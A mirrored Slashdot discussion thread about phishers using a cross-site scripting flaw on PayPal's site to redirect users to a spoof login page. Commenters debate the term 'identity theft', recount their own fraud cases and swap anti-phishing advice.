Slashdot Mirror
PayPal Security Flaw Allows Identity Theft
miller60 writes "Phishing scammers are actively exploiting a security flaw in the PayPal web site to steal credit card numbers belonging to PayPal users. The scam tricks users into accessing a URL hosted on the genuine PayPal site, which presents a valid 256-bit SSL certificate confirming that the site belongs to PayPal. However, some of the content on the page has been modified by the fraudsters via a cross-site scripting technique, and victims are redirected to a spoof site that requests their account details."
What most people don't realize is this, if your card number is stolen and someone uses it.. you aren't liable for the charge.
Unless a merchant has proof that you made the transaction on your credit card, you can always refute any charge on your credit card statement and you wont have to pay it.
MABASPLOOM!
I'm really tired of hearing this term. Nobody's identity is being physically stolen; therefore it is not theft. Please reference a SINGLE case when a "victim" woke up to find that he/she NO LONGER HAD AN IDENTITY!! It's even more absurd than arguing that copyright infringement is theft!
It really grinds my gears when industry lobbyists and shills use inflammatory rhetoric to exaggerate the impact of mundane, victimless crimes.
"Ask not what your country can do for you." --John F. Kennedy
How in the heck did they forge a 256 bit SSL certificate?!
Can't this just be revoked or traced back to the owner?
Please to be 'splainin', Luuuucyyy...
https://www.accountkiller.com/removal-requested
... Oh my God! How will the masses be able to buy gold for Wold of Warcraft? Something has to be done... GonzoTech
"Snatching defeat from the mouth of victory on a daily basis."
When the victim visits the page, they are presented with a message that has been 'injected' onto the genuine PayPal site that says, "Your account is currently disabled because we think it has been accessed by a third party. You will now be redirected to Resolution Center." After a short pause, the victim is then redirected to an external server, which presents a fake PayPal Member log-In page. At this crucial point, the victim may be off guard, as the paypal.com domain name and SSL certificate he saw previously are likely to make him realise he has visited the genuine PayPal web site - and why would he expect PayPal to redirect him to a fraudulent web site?
What will they think of next? I must say, I get more PayPal phishing emails than for anything else. With the profusion of them, and PayPal's constant warnings that they would never ask for such information, it's still amazing how many people will fall for this, especially as the spoofs get more slick and sophisticated.
GetOuttaMySpace - The Anti-Social Network
"by tricking users into accessing a URL hosted on the genuine PayPal web site" How are hackers injecting this code into a legitimate paypal website?? Don't you have to modify the source code on the paypal servers themselves?
Bored?
Of course, if you've been silly enough to use a debit card, you're out the money for six months or however long it takes until the bank gets around to deciding that you didn't really spend the money. Happened to Tom Tomorrow.
Laws do not persuade just because they threaten. --Seneca
You're right; it's not identity theft, it's identity fraud. Which, guess what, has its victims.
Is this some sort of natural outgrowth of MP3 downloading and software piracy? What are we going to pretend is "victimless" next?
Laws do not persuade just because they threaten. --Seneca
This extremely detailed and thorough (~3 paragraphs long) article does sound like PayPal has a problem to take care of, but the flaw described doesn't remove the burden of stupidity from the phishing equation.
... sorry, I just live in a college town where the newspapers report bank fraud once a month because some stupid student fell for the 23 emails they received about suspicious activity concerning their bank account. Annoying.
Anybody can make a website look like another website, so it's up to a user to think. Get an email that doesn't make any sense? Think very hard about everything that it leads you to. PayPal asks for your ATM PIN? Who the fuck does that? Nobody. My bank doesn't even know what my PIN is.
The server currently running the scam is hosted in Korea
North? South?
As I post this, 6 out of 8 top level posts have a '?' in the subject,
now 7 out of 9.
try { do() || do_not(); } catch (JediException err) { yoda(err); }
I don't know how this is a surprise to anyone "cross-site scripting techniques" are so common now there writing magazine articles about them go look at the last 2600 and you will find out how to do it and that you can start with myspace.com.
TheADDkid.com
"Is this some sort of natural outgrowth of MP3 downloading and software piracy? What are we going to pretend is "victimless" next?"
AFAIK, at least one psychopath has already argued that raping children is a victimless crime. It should be pretty hard to beat that, but I have no doubt that someone will try to.
Anyway, it's nothing new. The software pirates certainly didn't start it, they just found a niche where it's easier to convince someone that since a copy of the original was made, nothing had really been lost. But, as you can see, it doesn't prevent people from claiming the exact same when some demonstrable harm _did_ get done. (E.g., money from someone's account aren't duplicated, they actually disappear from person A to enter the possession of person B.)
And honestly seeing some of the arguments made, I can't help notice a common theme of handwaving someone else's loss, time, suffering, even pain, as unimportant and not enough to make anyone a victim or to make the act a crime. In effect, the gross disregard for other people. It's beyond individualism, and outright in the realm of sociopathy.
A polar bear is a cartesian bear after a coordinate transform.
Sorry, but if you are dumb enough to still fall for the "Update your account" email then you deserve to have your identity stolen.
This just in! 3 out of 4 people make up 75% of the population.
Never follow a link in an email.
It may be convenient, but in the vast majority of cases I've found that I can navigate from the main page if I know what I'm looking for. You can do basically everything from paypal.com without following the link that takes you directly to a specific page.
I rarely use paypal, checked my bank statement one day, and realized 2k was missing from my bank courtesy of paypal. I have never clicked on a paypal email, and so the only explaination I could think of is either gross incompetance at paypal, or a keylogger was on my system (which was doubtful). Of course, I run all the major spyware/adware/virus/rootkit detectors and nothing (and yes, I do have a firewall, do not use wireless on this computer, and have a good password).
So, no more paypal for me. Of course I eventually got my money back, but it was a major hassle. For now on I am creating accounts using temp credit card numbers.
This shouldn't really be a problem. It only occurs if you click on a link in the e-mail. If you ignore the link in the e-mail, go to PayPal through a bookmark of your own and proceed from there, the phisher can't inject any code. End of problem. And if what the e-mail's asking for is legitimate, you'll be able to do anything you need to do directly through PayPal without needing to use any links in the e-mail.
First rule: never trust the identity of the other party if you didn't initiate the contact yourself. When someone calls you on the phone claiming to be your bank you don't trust them, you hang up and call your bank's customer-service number yourself. When someone sends you an e-mail claiming a link will take you to PayPal you don't trust that, you fire up your browser and use your own bookmark to hit PayPal.
You are right that 'identity theft' is a misleading and incorrect term. However, most people will just tell you 'I could care less.'
However, you are wrong that it is a victimless crime.
For example, if I use your Slashdot username to post troll comments under your name, it will negatively affect your karma, and not mine. Same thing applies with other forms of using someone else's identity, except instead of karma, think 'credit history', 'bank account' or 'criminal record'.
I'll probably be modded down for this...
- PayPal will always include your full name in any e-mail correspondence, not "Dear PayPal Member/User/etc."
- PayPal tells never to click on a link to log in to their site. They say always type the url: https://www.paypal.com/
Additionally, you should report all spoof e-mails to spoof@paypal.com. Hopefully PayPal will be able to track these online criminals down with the help of users.Taking guns away from the 99% gives the 1% 100% of the power.
http://www.cgisecurity.com/articles/xss-faq.shtml
Believe me, if I started murdering people, there would be none of you left.
Um where in the article did it say it was another email scam? Oh wait it didn't It has nothing to do with email it has to do with "They are presented with a message that has been 'injected' onto the genuine PayPal site" "via a cross-site scripting technique." It has nothing to do with email. RTFA
TheADDkid.com
I've been working on this for years now...decades actually....but now I'm totally protected from people stealing my identity and ruining my credit. Here's how I did it:
I've personally destroyed my credit so badly over the years that if someone were to steal my identity, the joke would be on them! Hell, it may actually even help my credit.
Oh sure, people laughed at me over the years...but who's laughing now?!! Ok....so they're still laughing at me...but that's beside the point.
"Leo Fender was in a 'state of grace' when he designed the Stratocaster." -- Paul Reed Smith
I hardly ever use it and PayPal is too big a target with too poor security, and almost nonexistent procedures for recovery after fraud.
MO take 6 months to clear, are trivial to forge, and impossible to verify ahead of time. They bite even worse than Western Union for buyers.
When you commit copy-theft against a song, it makes the artistic owner of that song sad, and you can hear the sadness in their songs. Studies show that you can also hear the sadness in the original copy. The song didn't actually change of course, but it sounds sadder, because of all the crimes committed against it.
So copythieving does affect your ability to listen to songs.
- RIAA Anti Theft Squad
I'll probably be modded down for this...
I used to have a brokerage debit card. It withdrew funds from my money market account. It was an insane risk to use that card. It would have been a jackpot if thieves got that number. And my financial life would have been in ruins for months.
Since the bubble burst, I don't have to worry about having a lot of money in a money market account.
Paypal's main site (http://www.paypal.com) does *NOT* do a permanent redirect to https://www.paypal.com, so if you hit www.paypal.com you give your paypal login and password in the clear. I've emailed them several times on this and have finally given up, as they don't bother to respond.
So if you can get inbetween Paypal and your target, you don't even need to fool anybody.
The exploit uses the concept of cross-site scripting (XSS, not CSS). XSS can work in some interesting ways to trick users. It's certainly more sophisticated than your typical "www.somerandomsite.com/ebay/login.cgi" phishing schemes you see.
You can read some more about XSS.
Korea is commie either side, only on one side they die in the streets and maybe get a once-over look, and on the other side, no one looks at all.
A few weeks ago, I would have agreed with you. More recently, I've been doing some research and found that only rarely are there obvious 'tells' like asking for a PIN.
You see, in addition to making it look exactly like the vendor's site, they now no longer ask for anything unusual. You click on the link, and are presented with the standard, expected login page. You log in, and everything works just like normal. What really happens is that you log into their server, they capture your information, and redirect the login to the actual vendor. You never receive a hint that you were duped until the charges start showing up.
These days, a suspicious URL in your browser is often the only clue you'll get -- and if you don't have the latest patches for the popular browsers, the URL can be disguised.
This isn't to say that there is no stupidity factor. People still fall for the old style phishing scams like you described, or "validate your credit card numer" scams with startling regularity. Most people fail to realize that a simple precaution can make you essentially immune to phishing attempts (like disabling HTML in emails).
However, the newest round of phishing is a lot more sophisticated, and a lot more convincing. As it becomes more prevalent, expect mass stupidity to be less of a factor in its success.
Never. If it's important, you can go to PayPal's website manually, through a different tab or browser window, and check for yourself.
tasks(723) drafts(105) languages(484) examples(29106)
If the email doesn't give you instructions on how to NAVIGATE to a section of their webpage then don't follow the link. No matter how smart we all think we are, we can be tricked. The best thing to do is always start from the company's main page, then browse from there. That way if anything happens, you can blame it on their site.
That's what I tell my wife, who gets lots of phishing emails, and it seems to work. It doesn't matter if your bank says they're going to shutdown your account, if they can't take the time to call you personally, have you call them personally, have you visit personally, or tell you how to navigate to a portion of their site then it isn't that important.
I tell people the same thing with scam emails that purport to be from the police/FBI/etc. I figure if the authorities really need to get a hold of me they can to do it in person.
Faith is a willingness to accept something w/o complete proof and to act on it. Reason allows you to correct that faith.
it's a feature.
Seriously, it is. Look it up. It's unfortunate that the programmers down at PayPal don't have enough wisdom, foresight, and intuition to see that it could be used in such a way.
inject.
I got took for a paycheck's worth, with no high tech used or needed.
Someone hand copied all the info on my car, front and back, when it was used at a restaurant.
I called the bank (Fleet, often considered big and difficult), they looked at everything that happened, I told them which ones were bogus, their fraud department confirmed the details of the transactions (location, times, names - these people were dumb enough to charge at Woolworths overseas, and paid bills for Progressive insurance, ATT and Verizon cells and Cablevision - all eminently traceable).
They reversed the charges, and said they were still subject to verification, and since they were all as I presented them. I got it all back and kept it. Most of the money was back after the next overnight, the rest was back after two overnights.
"Win treats sysadmins better than users. Mac treats users better than sysadmins. Linux treats everyone like sysadmins."
..if the user is saavy enough to know about SSL certificates and URL's you'd think he'd be smart enough NOT to click a link sent to him via email.
by sending the full headers and links to spoof@paypal.com
-- Tigger warning: This post may contain tiggers! --
There is no reason for them to make the home page https - they probably serve millions of visits to this page daily, why serve all the people who just want to read about Paypal or check the help section using SSL and waste processing power?
The login form submits using POST over SSL - the action of the form is using an https target. Your browser therefore sends all your details securely:
<form method="post" name="login_form" action="https://www.paypal.com/
In other words, it's no wonder they haven't fixed it - nothing is broken.
It's important to educate oneself about basic security. Don't click a link in any email that refers to PayPal. As a matter of fact, there are few reasons to click links in any emails.
Just as important, seriously, educate others. Don't mumble "Darwin" or "figure it out yourself" when you can help someone else protect themselves or educate themselves about security threats.
Always report PayPal phish attempts to spam@paypal.com.
There's an excellent set of resources about phishing in general - and you can report phishing attempts at: antiphishing.org.
Not to be repetitive, but the best way to make a difference (in this case) is to help others and help yourself with education.
A Passionate Independent Musician
I meant to say spoof@paypal.com.
Sorry, I must have been hit with the stupid stick today.
A Passionate Independent Musician
If you get a message from any orginization you deal with online, your bank, eBay, even your free webmail account do NOT click on the link. Go to their site and log in as you normally do. Why? Well because if they need something, the site will let you know as soon as you log in. There's no possibility for any kind of redirection attack since you actually went to the site properly.
in their attempt to break into the on-line payments business?
I recently (re)opened an account to buy a pinball machine on eBay (Stern Stars, a cool old machine), but it is only tied to my credit card. I'm very familiar (through personal experience) with PayPal's inability to handle fraud (the reason I closed my original, bank-linked account) and their lose-lose-win schemes (on a contested purchase, the buyer loses their money, the seller loses the item, and PayPal gets the big win by keeping any contested funds). I would probably have closed the account again, but my wife wanted to purchase some baby periphenalia from a home-based business that only accepts checks or PayPal. I'm thinking this article is areminder to close my PayPal account.
Frankly, I will be very, very happy once Google's tool is available and I have a viable on-line payments alternative to PayPal.
Interested in a Flash-based MAME front end? Visit mame.danzbb.com
There's nothing like the feeling of NOT getting a credit card bill once a month, except not having a car payment to make, or a mortgage payment to make either. (I 'lucked out' despite having MS.)
:-)
I have ONE credit card left and that gets used judiciously. Its also a pay by phone type deal with security identification.
I have no credit rating because I don't WANT any (and I can afford NOT to have any.
You wouldn't believe the number of CapitalOne offers that I've put through the shredder over the years.
When I was young, broke but promissing, I could have used the credit. But I didn't have any.
Now that I'm an old fart, I'm stumbling over piles of credit card and 'mortgage renewal' offers.
Well they can all go fuck themselves.
MSBPodcast.com The opinions expressed here are my own. If you don't like 'em... Think up your own stuff.
an 'upgrade'?
What the heck is wrong with you?
MSBPodcast.com The opinions expressed here are my own. If you don't like 'em... Think up your own stuff.
It displays the actual content of the link as a pop-up.
I then copy the link into a browser window but not the URL portion. I usually have NW-tools.com up on my browser and use that to check the origin of the message.
I do that with all the phony 'meds' spam I get too.
People have to be really STOOP-ID to click on a link on an email.
I don't even do that with mail purporting to be from people I know.
MSBPodcast.com The opinions expressed here are my own. If you don't like 'em... Think up your own stuff.
I agree about stupidity still being necessary; the headline made it sound like PayPal itself had been hacked & compromised without user interaction. This belongs in the Phish bucket.
Sure, a site can adopt practics to make itself more resistant to cross site scripting, frame injection, etc., but this isn't anything new, and for the forseeable future, there will continue to be browser flaws that the targeted site can do nothing about.
A preponderance of users will always be stupid. I don't see this kind of thing going away unless someone develops an ultra-hardened alternative browser, and it then became ubiquitous, i.e. a large majority of people never access sites with high-value PII any other way.
At a minimum, a browser for this purpose would have to be single instance, no tabs, no background windows, non-invokable from externally clicked hyperlinks, and resistant to programmatic instantiation. It would have to encrypt all cached data, and only submit requests to domains that were explicitly pre-authorized by the user -- with an IP check on the associated netblock & whois info at the time of the request.
For obvious reasons, this couldn't be a general-purpose browser. But financial services providers might stand to gain from a collaborative effort to commission such a browser & then *strongly* encourage (read: coerce) users into adopting it for sites with high-value private information.
Pi Ran Out
OK, I am stupid. If the "hackers" can present a legit SSL certificate, what good is it? The whole point (at least my dumb ass thought) of an SSL certificate was to provide assurance that you are dealing with a legit vender. I thought the exact domain name was encoded with the URL so that an SSL certificate could not be used with a bogus URL? Is it just that these hackers used a valid sub-page off PayPal's website?
Bottom line, what does one do to prevent this as a web host and what does one look for (aside from the obvious be weary of the website asking you about your personal info) to know its a scam?
The Netcraft anti-phishing Toolbar already protects PayPal users by blocking access to this site. IE and firefox users can download the toolbar as an extension to the browser and install it.
http://toolbar.netcraft.com/
l'Homme n'est Rien l'Oeuvre Tout: Gustave Flaubert to George Sand
Be careful using a Temp. Credit Card Numbers. Some of them aren't temporary at all, just "sticky". For instance, Discover Card's number generator's numbers are good until the expiration date at the first vendor that uses it. So it's not much good for protecting your paypal account if someone steals it from paypal and uses it in another paypal account.
I guess Netcraft has confirmed then, that PayPal is dying.
Next expect scammers to use Skype to phone you for your password, PayPal to empty your bank account, and eBay to sell the goods they steal from you. eBay is offering crooks one stop shopping to rip you off.
Oh You POS
http://slashdot.org/comments.pl?sid=188468&cid=155 35469
...
Wanna fight ? Bend over, stick your head up your ass, and fight for air.
...why it is that whenever I log into PayPal, the number of PayPal-phishing e-mails suddenly increases over the next few minutes? It's as if something is monitoring traffic destined for PayPal (a compromised router, perhaps?) and is automatically triggering phishing e-mails to the originating IP.
Has anyone else seen this?
--Rob
Towards the Singularity.
If I see anything notifying me of an account issue, if it looks like it could be legit, I go directly to the site by typing in the URL.
If there is a real account issue, and it's a company worth doing business with, I'll be able to find out how to resolve it without clicking on any external links to get there.
Now, if they have a way to crack into PayPals website and insert the dangerous link... thats a problem
Maybe both.
"No fear. No envy. No meanness." Liam Clancy
Old joke:
... wait for it ...
Someone stole all my credit cards but I've decided not to report it yet.
So far the thief is spending less than my wife.
They get the script injection by clicking on a malformed URL.
What would be the best way to get a whole assload of malformed URLs out?
Maybe email spams? Wow, what convoluted logic.
Mod parent (-1, Needs His Ritalin)
Even Wells Fargo and Yahoo have stopped doing this. They used to host http to https form login, but stopped because that's obviously not secure enough due to the lack of site certificate verification, and that "transit" step where somebody could have injected something.
I personally don't like the feeling that it could have been sniffed over the wire, although technically it shouldn't be possible with a POST to https.
What? Are they sending out excel spreadsheets to their users?
----- I have bad karma for a reason! -----
This is not new. Legitimate sites are hacked more often than anyone cares to admit, and end up hosting fraudulent pages that indeed link to an outside page, often with the domain in the web bar masked. Everyone should know by now to go directly to a page, and those who chose to ignore this should either be banned from the internet as their falling for these scams encourages crooks, or else they deserve what they get.
Something else not knew is domain masking, which I am sure you all know about.
*sigh* When your ID is stolen, as mine was the "good old-fashioned way" when I was 18 (25 now), it sets you up for years of frustration, thousands you can't recoup, and makes you wonder why the hell people aren't more vigilant about protecting their identity. Once it's lost, you've got no hope, and dozens of police reports are no longer enough to get a new social to get your life back on track. Finding another ding on your report, another credit card in your name, a speeding ticket in a state you've never been to...it all becomes just something you accept, though no less frustrating. And these is no end in sight, not until people wise up and uard themselves to discourage people from even trying. And even that won't be enough.
It's a girl!
Why can't people understand this!?!?!
There is NO identity theft. It is all identity FRAUD. F-R-A-U-D!
It's the same copyright theft vs copyright infringment argument.
Geeze people are retarded.
Libertas in infinitum
Please don't tell me I have to reset my password and re-enter all my credit card information for the fourth time this month!
Right, but my point is that during the dispute process, they have your money. In at least one case (linked to in the original comment), that process took a considerable amount of time. Had it been a credit card, Tom Tomorrow would not have been essentially making a loan of that money to the fraudster.
Laws do not persuade just because they threaten. --Seneca
I suppose a psychopath will say lots of wacky things, but do you know which one this was?
Laws do not persuade just because they threaten. --Seneca
Well, a first for me... they got me.Iopened a new paypal account on Monday, and by Wednesday, my credit card was being fleeced. Worst of all, there is no way these guys get caught based on the following actions by the involved entities: Paypal: Classic, I contacted Paypal on Wednesday, "we have had no security problems.... Don't reply to phishing scams." (no shit sherlock, i just figured I was safe entering information directly into your website using SSL). When elevated up the customer support retard chain, I was then lectured on phishing scams (damn these people are bright), and told to contact my local authorities. Unreal... my local authorities... I wonder how many local reports are taken nationally due to these wankers. Follow up today (Friday), "you should contact our security" [by filling out our webform that warns you incessently about phishing scams and that tells you after you fill out the form that they will get back to you in about 10 days... nice]. Mastercard: I contacted my credit card company, they cancelled the card but will not investigate until I fill out an affidavit, "which will take about 14 days to arrive." Kmart: I contacted Kmart, being one of the companies that put through charges to my credit card. "We cannot give you any information without your purchase number" (unreal, my credit card is used for illicit purchases, and I cannot find out where they are shipping the goods). They were nice though, and suggested I fax information to them if I wanted to speak to a security person, and they also suggested I have my local police contact them. Frederick's of Hollywood: Another company that put charges on my card- "We don't have a security department, call your credit card company." Will someone please shoot that g-string wearing cow. Local Police - I filled out an online complaint on Wednesday with the financial fraud division of my local police department. Still haven't heard a thing. I went the extra mile and filed a complaint with the FBI's Internet Crime Complaint Center: Classic moment in law enforcement... after filling out the extensive affidavit, I received a generated email that read in part, "The IC3 receives thousands of complaints each month and does not have the resources to respond to inquiries regarding the status of complaints. It is the IC3's intention to review all complaints and refer them to law enforcement and regulatory agencies having jurisdiction. Ultimately, investigation and prosecution are at the discretion of the receiving agencies." [in other words, we really don't do anything, best of luck old chap]. I wish the crew working this scam the best, they are truly disgusting, but ingenious. As for the entities above, the next time I hear a news report where they are whining about credit card fraud costing consumers and businesses millions, I'll just chuckle at how pathetic the reaction was to my inquiries. They really don't care. Finally, some have posted that it won't cost me anything.... they are wrong. Some credit cards require the user to pay the first $50 of such fraud. And what about the people who just don't catch the credit card fraudulent uses. If you do not challenge the charge within 90 days, in most cases, you own the debt. Finally, by having my credit card cancelled for fraudulent purposes, I am the lucky recipient of a fraud alert on my credit statements with the credit reporting agencies for at least the next thirty days (I think 60). This means that I am barred from gaining any instant credit during this time period. Several years ago I had fraud on another credit card (authorities believed that the info was lifted from the card while I was on vacation when I paid for something at a restaurant). I cancelled the card, but a couple weeks later there I was buying $2,000 worth of lumber at home depot for a home project. The clerk says to me, hey if you open up a home depot card, I can discount your purchase by 10%. Hey, I don't need a home depot card, but 200 bucks is nothing to sneeze at. After filling out the form, I was reject
I got a reply from Paypal's security today, basically a form note telling me the horrors of phishing and noting that "the email was not sent by paypal." I sort of wonder if they realize they have this security problem. These people kill me.
From the article:
"... are subsequently presented with another page which requests them to enter further details to remove limits on the access of their account. Information requested includes social security number, credit card number, expiration date, card verification number and ATM PIN."
Now who in their right mind would ever enter their SSN or especially ATM PIN into such a web based form? The only place I have ever been asked to use my ATM PIN online is my banks login, and I whined and cried to the bank about that. The bank now has a password feature that does not use the ATM PIN which I feel much better with. My main problems with using the ATM PIN as a IP transmitted login password were A: It made my account less secure if my PIN was stolen via a store spycam or similar non IP "over the shoulder" type exploit. B: The PIN length the bank used (4 char) was too short for a decently secure transmitted password. C: Simple separation of risk. D: The only way I could change my PIN and thus IP login was via a bank visit and physical note to a cashier. My bank now allows for an 8-16 character login password that I can change over IP.
Other notes on these issues. I recently backed out of a credit report service signup form because I was uncomfortable with the information they wanted. These credit reporting agency's and the information they want make me nervous. I have used one of the big three a couple of times before and guess I will probably just stick with the expensive services they offer. I ALWAYS do my banking with a single session of Firefox or Mozilla, clear the cache and kill the session when I am done, then start a new instance BEFORE I browse anything else. Of course this is pretty much not possible with Paypal and eBay. However I typically only use the eBay provided "Pay Now" button in "My eBay" instead of one provided by a vendor, even if I have to use their checkout service to process my shipping address and such.
It is unfortunate that it does seem to require more than just "a little common sense" to use such online services safely. The be any kind of safe one it seems one needs to be almost pathologically paranoid. The silver lining is at least I guess that part of my sometimes warped psyche finally might work for my benefit.
Matthew
My bank has switched to using website messages due to the fact of the spamming emails I love the ones I get for chase when I have never had an account with chase
Well the smart thing then would be to have an account that doesn't allow overdraft. For all the banks I've dealt with it's an option. In many it's a privilege (e.g. people with bad credit cannot get an overdraft account, as it is a form of credit itself).
Plenty of people I know don't have an overdraft account. Attempt to go $0.01 above what they're holding as a balance and the transaction is rejected.
Some people will never learn:& mode=classic
http://ars.userfriendly.org/cartoons/?id=20030823